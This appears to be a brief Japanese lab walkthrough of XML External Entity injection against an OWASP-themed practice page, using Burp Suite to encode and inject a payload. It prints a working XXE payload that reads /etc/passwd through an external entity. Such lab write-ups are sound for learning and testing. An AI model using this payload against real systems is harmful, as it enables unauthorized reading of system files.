Hello there, ('ω')ノ
OWASP 2017 ⇨ A4 ⇨ XML External Entity Injection ⇨ XML Validatorを選択して。
まずは、サンプルを入力して結果を確認して。
Burp Suiteで、XMLのパラメータを確認して。
今回は、下記のペイロードを仕掛けることに。
まずは、『Decoder』タグでエンコードしなくては。
<?xml version="1.0"?>
<!DOCTYPE change-log[
<!ENTITY systemEntity SYSTEM "../../../../etc/passwd">
]>
<change-log>
<text>&systemEntity;</text>
</change-log>
エンコードされた内容をXMLのパラメータと置き換えて。
『Intercept is off』に切り替えると。
XMLのペイロードが実行された。
Best regards, (^^ゞ